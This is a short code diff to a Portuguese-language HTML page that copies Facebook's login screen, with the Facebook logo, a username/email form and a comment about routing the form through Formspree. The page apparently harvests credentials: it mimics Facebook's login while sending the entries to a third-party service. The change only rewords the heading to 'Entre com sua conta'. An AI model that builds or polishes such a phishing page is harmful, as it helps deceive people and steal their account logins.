--- a/index.html
+++ b/index.html
@@ -106,7 +106,7 @@
   <div class="login-container">
     <div class="login-box">
       <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/8/89/Facebook_Logo_%282019%29.svg/2560px-Facebook_Logo_%282019%29.svg.png" alt="Facebook Logo">
-      <h2>Entrar no Facebook</h2>
+      <h2>Entre com sua conta</h2>
       <!-- Configuração do Formspree -->
       <form id="login-form">
         <label for="email">Usuário ou Email:</label>
